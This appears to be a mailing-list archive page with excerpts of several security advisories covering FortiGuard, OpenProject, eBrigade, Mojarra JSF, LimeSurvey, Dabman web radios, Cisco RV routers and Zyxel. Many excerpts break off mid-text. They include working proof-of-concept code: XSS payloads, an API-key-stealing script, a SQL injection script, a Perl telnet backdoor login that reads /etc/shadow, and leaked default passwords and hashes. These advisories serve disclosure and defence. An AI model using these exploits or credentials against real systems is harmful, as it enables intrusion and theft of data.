our initial advisory stated that FortiOS v6.0.7 fixes the issue. Fortinet has
just now confirmed that only v6.2.0 includes the patch. See their advisory:
https://fortiguard.com/psirt/FG-IR-18-100

SEC Consult Vulnerability Lab

On 25.11.19 14:43, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20191125-0 >
> =======================================================================
>               title: FortiGuard XOR Encryption
>             product: Multiple Fortinet Products (see Vulnerable / tested
>                      versions)
>  vulnerable version: Multiple (see Vulnerable / tested versions)
>       fixed version: Multiple (see Solution)
>          CVE number: CVE-2018-9195
>              impact: High
>            homepage: https://www.fortinet.com
>               found: 2018-05-16
>                  by: Stefan Viehböck (Office Vienna)
>                      SEC Consult Vulnerability Lab
>
>                      An integrated part of SEC Consult
>                      Europe | Asia | North America
>
>                      https://www.sec-consult.com
> =======================================================================
>
> Vendor description:
> -------------------
> "From the start, the Fortinet vision has been to deliver broad, truly
> integrated, high-performance security across the IT infrastructure.
>
> We provide top-rated network and content security, as well as secure access
> products that share intelligence and work together to form a cooperative
> fabric. Our unique security fabric combines Security Processors, an intuitive
> operating system, and applied threat intelligence to give you proven security,
> exceptional performance, and better visibility and control--while providing
> easier administration."
>
> Source: https://www.fortinet.com/corporate/about-us/about-us.html
>
>
> Business recommendation:
> ------------------------
> The vendor provides a patch and users of affected products are urged to
> immediately upgrade to the latest version available.
>
>
> Vulnerability overview/description:
> -----------------------------------
> Fortinet products, including FortiGate and Forticlient regularly send
> information to Fortinet servers (DNS: guard.fortinet.com) on
> - UDP ports 53, and
> - TCP port 80 (HTTP POST /fgdsvc)
>
> This cloud communication is used for the FortiGuard Web Filter feature
> (https://fortiguard.com/webfilter),
> FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam)
> and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus).
>
> The messages are encrypted using XOR "encryption" with a static key.
>
>
> The protocol messages contain the following types of information:
>
> **Serial number of the Fortinet product installation** (product type + unique
> ID).
> This information allows an attacker who can **passively monitor** internet
> traffic to:
> - learn which Fortinet products and product types an organization uses
>   (this is valuable for information gathering, see EquationGroup Fortigate
>   exploits)
> - learn which FortiClient installations are part of an organization
> - use the FortiClient serial number as a unique identifier to track an
>   individual as he/she travels the world
>
>
> **Full HTTP URLs of users web surfing activity** (Web Filter feature).
> This information allows an attacker who can **passively monitor** internet
> traffic to spy on users' web surfing activity. In cases where SSL inspection
> is enabled, even the URLs of HTTPS-encrypted communication are sent via this
> protocol, effectively breaking the confidentiality of SSL/TLS.
>
>
> **Unspecified email data** (AntiSpam feature).
> We do not have any further information on what kind of information is sent by
> the AntiSpam feature.
>
>
> **Unspecified AntiVirus data** (AntiVirus feature).
> We do not have any further information on what kind of information is sent by
> the AntiVirus feature.
>
>
> By **intercepting and manipulating** internet traffic an attacker can:
> Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus
> features.
>
>
> Proof of concept:
> -----------------
> The following Python 3 script decrypts a FortiGuard message (the static XOR
> key has been removed from this advisory).
>
>
> ```python
> from itertools import cycle
>
> def forti_xor(s1):
>     xor_key = **removed**
>     message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key)))
>     return message
>
> r1=bytes.f
SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products
SEC Consult Vulnerability Lab Security Advisory < 20191125-0 > === title: FortiGuard XOR Encryption product: Multiple Fortinet Products (see Vulnerable / tested versions) vulnerable version: Multiple (see Vulnerable / tested versions) fixed version: Multiple (see Solution) CVE number: CVE-2018-9195 impact: High homepage: https://www.fortinet.com found: 2018-05-16 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "From the start, the Fortinet vision has been to deliver broad, truly integrated, high-performance security across the IT infrastructure. We provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our unique security fabric combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration." Source: https://www.fortinet.com/corporate/about-us/about-us.html Business recommendation: The vendor provides a patch and users of affected products are urged to immediately upgrade to the latest version available. Vulnerability overview/description: --- Fortinet products, including FortiGate and Forticlient regularly send information to Fortinet servers (DNS: guard.fortinet.com) on - UDP ports 53, and - TCP port 80 (HTTP POST /fgdsvc) This cloud communication is used for the FortiGuard Web Filter feature (https://fortiguard.com/webfilter), FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam) and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus). The messages are encrypted using XOR "encryption" with a static key. 
The protocol messages contain the following types of information:

**Serial number of the Fortinet product installation** (product type + unique ID).
This information allows an attacker who can **passively monitor** internet traffic to:
- learn which Fortinet products and product types an organization uses (this is valuable for information gathering, see EquationGroup Fortigate exploits)
- learn which FortiClient installations are part of an organization
- use the FortiClient serial number as a unique identifier to track an individual as he/she travels the world

**Full HTTP URLs of users' web surfing activity** (Web Filter feature).
This information allows an attacker who can **passively monitor** internet traffic to spy on users' web surfing activity. In cases where SSL inspection is enabled, even the URLs of HTTPS-encrypted communication are sent via this protocol, effectively breaking the confidentiality of SSL/TLS.

**Unspecified email data** (AntiSpam feature).
We do not have any further information on what kind of information is sent by the AntiSpam feature.

**Unspecified AntiVirus data** (AntiVirus feature).
We do not have any further information on what kind of information is sent by the AntiVirus feature.

By **intercepting and manipulating** internet traffic an attacker can:
- Manipulate the responses for the FortiGuard Web Filter, AntiSpam and AntiVirus features.

Proof of concept:
---
The following Python 3 script decrypts a FortiGuard message (the static XOR key has been removed from this advisory).
```python
from itertools import cycle

def forti_xor(s1):
    xor_key = **removed**
    message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key)))
    return message

r1 = bytes.fromhex('6968766f606e776c2d2d21262138475c5b5a475b545e475c6b6a776b646e776c6b6a772b646e776c6b6a776b646e776c6b6a776bbadf04036b6a776c616a846f')
print(repr(forti_xor(r1)))
```

In this case the encrypted message contents are:
'\x02\x02\x01\x04\x04\x00\x00\x00FGVMEV00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00...'

Another example:
'\x02\x01\x02\x04úI\x03\x00FG100D3G\x00\x00\...x00\x00+https://v10.vortex-win.data.microsoft.com/\x00'

Vulnerable / tested versions:
---
The following FortiOS versions are affected according to the vendor:
* FortiOS 6.0.6 and below
* FortiClientWindows 6.0.6 and below
* FortiClientMac 6.2.1 and below

The security advisory of the vendor can be found at:
https://fortiguard.com/psirt/FG-IR-18-100

Vendor contact timeline:
2018-05-17: Contacting vendor through ps...@fortinet.com, sending advisory with publi
SEC Consult SA-20191014-0 :: Reflected XSS vulnerability in OpenProject
SEC Consult Vulnerability Lab Security Advisory < 20191014-0 >
===
title: Reflected XSS vulnerability
product: OpenProject
vulnerable version: <= 9.0.3, <=10.0.1
fixed version: 9.0.4, 10.0.2
CVE number: CVE-2019-17092
impact: medium
homepage: https://www.openproject.org
found: 2019-09-27
by: David Haintz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"OpenProject is the leading open source project management software. Support your project management process along the entire project life cycle: From project initiation to closure."
Source: https://www.openproject.org/

Business recommendation:
Update to the latest version of OpenProject. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected by further security issues.

Vulnerability overview/description:
---
1) Reflected XSS vulnerability (CVE-2019-17092)
The project list of OpenProject lacks input validation on data that is output inside an error message. Due to the Content Security Policy, inline scripts/styles were not allowed and the script source was limited to 'self'. To bypass this, a JavaScript file was added as an attachment to an existing project. This could be used to extract the CSRF token and create a new API key.

Proof of concept:
---
1) Reflected XSS vulnerability (CVE-2019-17092)
Within this proof of concept, two steps are done. First, the JavaScript code to be executed is uploaded as an attachment to fulfill the Content Security Policy of 'self'. In the second step, the uploaded JavaScript code is executed through the reflected XSS vulnerability by using a script tag.

a) Upload JavaScript code
An attacker can upload a JavaScript file as an attachment into any project in the default configuration. The attachment can be called directly, but will be downloaded automatically. But since the browser does not care whether a file shall be downloaded or displayed when loading it from a src attribute, an attacker can easily use it for the reflected XSS vulnerability. In this proof of concept the following JavaScript code was uploaded:

```javascript
(async () => {
  // read the CSRF parameter name and token from the page's meta tags
  var csrf_param = document.querySelector('meta[name=csrf-param]').content;
  var csrf_token = document.querySelector('meta[name=csrf-token]').content;
  // request a new API key with the victim's session
  var req = await fetch("http://$IP/my/generate_api_key", {
    "credentials": "include",
    "headers": {
      "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0",
      "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
      "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
      "Content-Type": "application/x-www-form-urlencoded",
      "Upgrade-Insecure-Requests": "1"
    },
    "referrer": "http://$IP/my/access_token",
    "body": "_method=post&" + csrf_param + "=" + encodeURI(csrf_token),
    "method": "POST",
    "mode": "cors"
  });
  var resp = await req.text();
  // extract the generated key from the response HTML
  var regex = /(Your access token is:\\)(.*)(\<\/strong\>)/gm;
  var api_key = resp.match(regex)[0];
  api_key = api_key.slice(35, -9);
  alert("Generated new API key: " + api_key);
})();
```

This gets the CSRF token and the parameter name (since this seems to be configurable) and sends a request to the generate_api_key functionality. After parsing, the key is exposed in a message box, but can be used for further operations like adding an administrative user.

b) Craft link
The reflected XSS vulnerability was found in the URL parameter 'sortBy' of the path '/projects'. There an attacker may add any HTML code. Such a link could be:
http://$IP/projects?sortBy=[[%22%3E%3Cscript%20src=%27/attachments/29/test.js%27%3E%3C%2Fscript%3E%22%2C%22%22]]

Vulnerable / tested versions:
---
The following versions have been tested, which were the latest versions available at the time of the test:
* 10.0.0
* 10.0.1
According to the vendor, all versions before v9.0.3 and v10.0.1 are affected.

Vendor contact timeline:
2019-10-02: Contacting vendor through secur...@openproject.com
2019-10-02: Vendor verified the vulnerabili
SEC Consult SA-20190926-0 :: Multiple SQL Injection vulnerabilities in eBrigade
SEC Consult Vulnerability Lab Security Advisory < 20190926-0 >
===
title: Multiple SQL Injection vulnerabilities
product: eBrigade
vulnerable version: <5.0
fixed version: >=5.0
CVE number: CVE-2019-16743, CVE-2019-16744, CVE-2019-16745
impact: critical
homepage: https://ebrigade.net
found: 2019-06-06
by: D. Haintz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"eBrigade is a web application that allows the management of personnel, vehicles and equipment of rescue centers (fire brigades), associations of first responders and military organizations. Highly configurable, eBrigade can meet the expectations of many other organizations. Skills management, generation of the cover sheet according to availability. Management of the interventions and the victims with assessment sheets rescuers. Private social network. Notifications and alerts by email and SMS. Accounting, reporting and numerous graphs allow precise monitoring of the organization." (translated)
Source: https://ebrigade.net/

Business recommendation:
The vendor provides a patch and users of this product are urged to immediately upgrade to the latest version available. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected by further security issues.

Vulnerability overview/description:
---
1) Multiple SQL Injection vulnerabilities
Due to insufficient sanitization of user input, an authenticated attacker can execute arbitrary SQL code in several SELECT statements. Since two of the three vulnerable parameters are completely unsanitized and responsible for serving ICAL files, an attacker can let a user download manipulated calendar files. Besides that, an attacker can also dump the whole database. The third vulnerability results from incorrect usage of sanitization functions. This enables an attacker to manipulate the SQL query with specially crafted requests, resulting in a blind SQL injection, as described in one of the following vulnerabilities.

a) & b) Multiple UNION SQL Injections (CVE-2019-16743, CVE-2019-16744)
The parameters of two links can be manipulated so that any arbitrary query to any table or database can be added to the output of the resulting calendar files using the UNION functionality of SQL.

c) Boolean-based Blind SQL Injection (CVE-2019-16745)
The parameters of a search result can be manipulated to guess the returned values of an arbitrary query.

Proof of concept:
---
1) Multiple SQL Injection vulnerabilities
All vulnerabilities were tested with an authenticated user with the lowest access rights (public). The whole PoC script requires an authenticated user for any functionality. The user is authenticated by a PHP session using the cookie PHPSESSID (may vary at different webservers). In conclusion, every request described below requires the PHP session cookie.

a) UNION SQL Injection in evenement_ical.php (CVE-2019-16743)
The script evenement_ical.php uses the unsanitized parameter "evenement" to query the database. The results are written into a downloadable calendar file. By adding a UNION statement, an attacker can extend the output with arbitrary data of the database:

The user input is read on line 42:
$evenement=(isset($_GET['evenement'])?$_GET['evenement']:"");

On lines 88-89 it is added to the SQL statement:
if ($evenement !="") $sql .= "\n and e.e_code = $evenement ";

Which is executed and fetched on lines 136 and 138:
$res = mysqli_query($dbc,$sql);
while($row=mysqli_fetch_array($res)){

Since e_code is of type integer, the proper sanitization method would be intval().

POC URL:
evenement_ical.php?evenement=1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--
-> Version after 'LOCATION:'

POC in Python:

```python
import requests
import string
import re

url = input("URL without file (i.e. https://localhost/ebrigade): ")
phpsession = input("PHPSESSID: ")
cookies = {'PHPSESSID': phpsession}

# UNION payload appended to the integer "evenement" parameter
payload = '+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--'

print("Testing vulnerability")
r = requests.get('{0}/evenement_ical.php?evenement=1{1}'.format(url, payload), cookies=cookies)

# the injected column ends up in the LOCATION field of the calendar file
matches = re.findall(r'^LOCATION:(.*)$', r.text, flags=re.MULTILINE)
print("Found version: {0}".format(matches[-1]))
```

b) UNION SQL Injection in evenements.php (CVE-2019-16744)
The script evenements.php uses the unsanitized para
SEC Consult SA-20190918-0 :: Reflected Cross-Site Scripting (XSS) in Oracle Mojarra JSF
SEC Consult Vulnerability Lab Security Advisory < 20190918-0 >
===
title: Reflected Cross-Site Scripting (XSS)
product: Oracle Mojarra JSF included in Java EE 7
Eclipse Mojarra JSF
vulnerable version: 2.2 & 2.3
fixed version:
https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING
https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING
https://github.com/eclipse-ee4j/mojarra
CVE number: -
impact: Medium
homepage: https://javaserverfaces.github.io/
found: 2018-11-12
by: Jean-Benjamin Rousseau (Office Zurich)
Guillaume Crouquet (Office Zurich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"JavaServer Faces technology simplifies building user interfaces for JavaServer applications. Developers can build web applications by assembling reusable UI components in a page; connecting these components to an application data source; and wiring client-generated events to server-side event handlers. This project provides information on the continued development of the JavaServer Faces specification. JavaServer Faces (JSF) is a JCP Standard technology for authoring component based user interfaces on the Java EE platform."
Source: https://javaee.github.io/javaserverfaces-spec/

Business recommendation:
By exploiting the vulnerability documented in this advisory, an attacker can execute arbitrary scripts in the context of the web application in the victim's browser. Besides performing arbitrary actions within the application with the victim's account or manipulating the application's interface, the attacker can potentially steal session tokens, redirect the victim to external pages and perform attacks against their browser. SEC Consult recommends users to implement the available patches.
Vulnerability overview/description:
---
The Mojarra implementation of JavaServer Faces (JSF) v2.2 and v2.3 lacks input validation on the javax.faces.ClientWindow parameter, which can lead to reflected cross-site scripting (XSS) under certain conditions. Mojarra JSF v2.2 and v2.3 are respectively the user interface standards for Java EE 7 and Java EE 8.

The vulnerability is not directly exploitable in Mojarra JSF v2.2 and v2.3. However, different frameworks based on this library and having a custom implementation of the Faces-Request HTTP headers for AJAX requests might be affected. PrimeFaces v6.0 is one example of a vulnerable framework.

This vulnerability affects the web applications fulfilling the following conditions:
- Usage of a framework based on Mojarra JSF v2.2 or v2.3
- Usage of AJAX requests in the web applications
- Custom implementation of the Faces-Request HTTP headers for AJAX requests
- Presence of the javax.faces.CLIENT_WINDOW_MODE context parameter set to "url" in the web.xml file:

<context-param>
    <param-name>javax.faces.CLIENT_WINDOW_MODE</param-name>
    <param-value>url</param-value>
</context-param>

Proof of concept:
---
In this proof of concept, the tests are based on PrimeFaces v6.0, an open source framework for JSF. Other frameworks based on Mojarra JSF 2.2 or 2.3 might also be affected.

Step 1: Generate an AJAX request on the web application and intercept it.
---
POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1
Host: $IP
Content-Length: 405
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://$IP
X-Requested-With: XMLHttpRequest
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163
Connection: close

javax.faces.partial.ajax=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0
---

Step 2: Transpose the POST parameters into GET parameters and build a new URL with it.
http://$IP/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0

Step 3: Strip out the javax.faces.ViewState GET parameter from the URL.
http://
SEC Consult SA-20190912-0 :: Stored and reflected XSS vulnerabilities in LimeSurvey
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
===
title: Stored and reflected XSS vulnerabilities
product: LimeSurvey
vulnerable version: <= 3.17.13
fixed version: =>3.17.14
CVE number: CVE-2019-16172, CVE-2019-16173
impact: medium
homepage: https://www.limesurvey.org/
found: 2019-08-23
by: Andreas Kolbeck (Office Munich)
David Haintz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"LimeSurvey is the tool to use for your online surveys. Whether you are conducting simple questionnaires with just a couple of questions or advanced assessments with conditionals and quota management, LimeSurvey has got you covered. LimeSurvey is 100% open source and will always be transparently developed. We can help you reach your goals."
Source: https://www.limesurvey.org/

Business recommendation:
LimeSurvey suffered from a vulnerability due to improper input and output validation. By exploiting this vulnerability an attacker could:
1. Attack other users of the web application with JavaScript code, browser exploits or Trojan horses, or
2. perform unauthorized actions in the name of another logged-in user.

The vendor provides a patch which should be installed immediately. Furthermore, a thorough security analysis is highly recommended as only a short spot check has been performed and additional issues are to be expected.

Vulnerability overview/description:
---
1) Stored and reflected XSS vulnerabilities
LimeSurvey suffers from a stored and a reflected cross-site scripting vulnerability, which allow an attacker to execute JavaScript code with the permissions of the victim. In this way it is possible to escalate privileges from a low-privileged account, e.g. to "SuperAdmin".
Proof of concept:
---
1) Stored and reflected XSS vulnerabilities

Example 1 - Stored XSS (CVE-2019-16172):
The attacker needs the appropriate permissions in order to create new survey groups. Then create a survey group with a JavaScript payload in the title, for example:
test
When the survey group is being deleted, e.g. by an administrative user, the JavaScript code will be executed as part of the "success" message.

Example 2 - Reflected XSS (CVE-2019-16173):
The following proof of concept prints the current CSRF token cookie which contains the CSRF token. The parameter "surveyid" is not filtered properly:
http://$host/index.php/admin/survey?mandatory=1=xxx=xxx%22%3E%3Cimg%20src=x%20onerror=%22alert(document.cookie)%22%3E=listquestions=question

If the URL schema is configured differently, the following payload works:
http://$host/index.php?r=admin/survey=1=xxx=xxx">=listquestions=question

Vulnerable / tested versions:
---
The vulnerabilities have been verified to exist in version 3.17.9 and the latest version 3.17.13. It is assumed that older versions are affected as well.

Vendor contact timeline:
2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204
2019-09-02: Fixes available:
https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
2019-09-03: Release of LimeSurvey v3.17.15 bug fix
2019-09-12: Coordinated release of security advisory

Solution:
---
Update to version 3.17.15 or higher:
https://www.limesurvey.org/stable-release

The vendor provides a detailed list of changes here:
https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released

Workaround:
---
No workaround available.
Advisory URL:
---
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain
Dabman & Imperial (i) Web Radio Devices - Undocumented Telnet Backdoor & Command Execution Vulnerability
linuxrc, login, ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route, run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc, udhcpd, umount, unlzma, usleep, zcat

Username: root
Password: password & password!

shadow
root:r.BF8RVw56BOA:1:0:9:7::: (decrypted: password & mldonkey)
ftp:!:0:: (decrypted: empty/blank)
usb:w.rW11jv2dmM2:13941:: (decrypted: winbond)

gshadow
root:::root,mldonkey

PoC: Exploit

```perl
use Net::Telnet ();
use Cwd;

$file="inputLog.txt";
$ofile="outputlog.txt";

# For local network change to localhost or local ip
@hosts = ("93.234.141.215");

foreach $hostip (sort @hosts) {
    $t = new Net::Telnet (Timeout => 10, Input_log => $file, Prompt => "/>/");
    print "\n\nConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...\n";
    print "\n\nAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600\n";
    $t->open("$hostip");
    $t->login("root","password");
    my @lines = $t->cmd('cat /etc/shadow');
    print "$hostip: Directories:\n";
    print "@lines \n";
    $t->close;
}
```

1.2 AirMusic Unauthenticated Command Execution (httpd)
The security vulnerability can be exploited by local and remote attackers without user interaction or a privileged user account. For security demonstration or to reproduce, follow the provided information and steps below to continue.

AirMusic Status Interface: http://93.234.141.215:80
Web-Server HTTPD UIData Path: http://93.234.141.215:8080

Note: Attacks can be performed in the local network (Localhost:80) or remotely by requesting the URL of the remote IP address (93.234.141.215) + forwarded remote port (Standard :23).

Get device name from Device
http://93.234.141.215:80/irdevice.xml

Set device name
http://93.234.141.215:80/set_dname?name=PWND

Set boot-logo (HTTP URL, requirement: JPG)
http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg

Display or retrieve channel logo
http://93.234.141.215:80:8080/playlogo.jpg

Changing the main menu with the selected language
http://93.234.141.215:80/init?language=us

Play stream
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav=NAME

Save audio file as message
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav=1

Recall channel hotkeys
http://93.234.141.215:80/hotkeylist

Current playback data
http://93.234.141.215:80/playinfo

Set volume from 0-31 & mute function
http://93.234.141.215:80/setvol?vol=10=0

Reset
http://93.234.141.215:80/back

Set stop
http://93.234.141.215:80/stop

Activate all back
http://93.234.141.215:80/exit

Send keystroke combo
http://93.234.141.215:80/Sendkey?key=3

PoC: Exploit Dabman & Imperial - HTML AutoPwner
http://93.234.141.215:80/set_dname?name=PWND>
http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg>
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav=NAME>
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav=1>

PoC: Checker for Modifications

```perl
#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple;

# fetch the status page twice so the two copies can be compared for changes
my $url1 = 'http://93.234.141.215:80/';
my $source1 = get( $url1 );
my $url2 = 'http://93.234.141.215:80/';
my $source2 = get( $url2 );

print $source1;
print $source2;
```

Solution - Fix & Patch:
===
A fresh updated version is available from the manufacturer Telestar to resolve the vulnerabilities in all i & d series products. It is recommended to install the updates as quickly as possible to ensure digital security.
1. Set the device to the factory setting
2. Select language
3. Switch off the device
4. Switch on the device
5. Network setup
6. Wait for "New Software" message
7. Press OK to start the update
8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624

Security Risk:
==
The security risk of the vulnerabilities in the online web radio with WiFi and user interface is estimated as critical. The vulnerability can be exploited by local attackers in a network or by remote attackers without user interaction or further privileged user accounts. The potential of the issue being exploited in thousands of end user devices all over Europe is estimated as high. The issue has the potential to be used by remote attackers for spreading ransomware / malware, mass defacements, compromises for further Linux network attacks or as part of a criminal IoT botnet.

Credits & Authors:
==
Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:
=
The information provided in this
SEC Consult SA-20190904-0 :: Multiple vulnerabilities in Cisco router series RV34X, RV26X and RV16X
SEC Consult Vulnerability Lab Security Advisory < 20190904-0 >
===
title: Multiple vulnerabilities
product: Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P, Cisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160, Cisco 160W
vulnerable version: Cisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15
fixed version: see "Solution"
CVE number: -
impact: High
homepage: https://www.cisco.com/
found: 2019-05-15
by: T. Weber, S. Viehböck (Office Vienna)
IoT Inspector
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Securely connecting your small business to the outside world is as important as connecting your internal network devices to one another. Cisco Small Business RV Series Routers offer virtual private networking (VPN) technology so your remote workers can connect to your network through a secure Internet pathway."
Source: https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html

Business recommendation:
We want to thank Cisco for the very quick and professional response and great coordination. Customers are urged to update the firmware of their devices.

Vulnerability overview/description:
---
1) Hardcoded Credentials
The device contains hardcoded users and passwords which can be used to log in via SSH, at least on an emulated device. During the communication with Cisco it turned out that: "Accounts like the 'debug-admin' and 'root' can not be accessed from console port, CLI or webui". Therefore, these accounts had no real functionality and cannot be used for malicious actions.

2) Known GNU glibc Vulnerabilities
The used GNU glibc in version 2.19 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2015-7547, "getaddrinfo() buffer overflow") was verified by using the MEDUSA scalable firmware runtime.
3) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.23.2 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA scalable firmware runtime.

4) Multiple Vulnerabilities - IoT Inspector Report
Further information can be found in the IoT Inspector report:
https://r.sec-consult.com/ciscoiot

Proof of concept:
---
1) Hardcoded Credentials
The following hardcoded hashes were found in the 'shadow' file of the firmware:
root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:9:7:::
debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:9:7:::
[...]
The undocumented user 'debug-admin' is also contained in this file.

Starting the dropbear daemon as a background process on the emulated firmware:
---
# dropbear -E
# [1109] Running in background
#
# [1112] Child connection from :52718
[1112] /var must be owned by user or root, and not writable by others
[1112] Password auth succeeded for 'debug-admin' from :52718
---

Log on via another host connected to the same network. For this PoC the password of debug-admin was changed in the 'shadow' file.
---
[root@localhost medusa]# ssh debug-admin@ /bin/ash -i
debug-admin@'s password:
/bin/ash: can't access tty; job control turned off
BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)
/tmp $
---

The 'debug-admin' user has the same privileges as 'root'. This can be determined from the corresponding sudoers file in the firmware:
[...]
## User privilege specification
##
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL

## Uncomment to allow members of group wheel to execute any command
# %wheel ALL=(ALL) ALL
[...]

During the communication with Cisco it turned out that: "Accounts like the 'debug-admin' and 'root' can not be accessed from console port, CLI or webui". Therefore, these accounts had no real functionality and cannot be used for malicious actions.

2) Known GNU glibc Vulnerabilities
GNU glibc version 2.19 contains multiple CVEs like:
CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472, CVE-2015-5277, CVE-2015-8778, CVE-2015-87
SEC Consult SA-20190829-1 :: External DNS Requests in Zyxel USG/UAG/ATP/VPN/NXC series
SEC Consult Vulnerability Lab Security Advisory < 20190829-1 >
===
title: External DNS Requests
product: Zyxel USG/UAG/ATP/VPN/NXC series
vulnerable version: see "Vulnerable / tested version"
fixed version: see "Solution"
CVE number: -
impact: medium
homepage: https://www.zyxel.com
found: 2019-06-19
by: Thomas Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally."
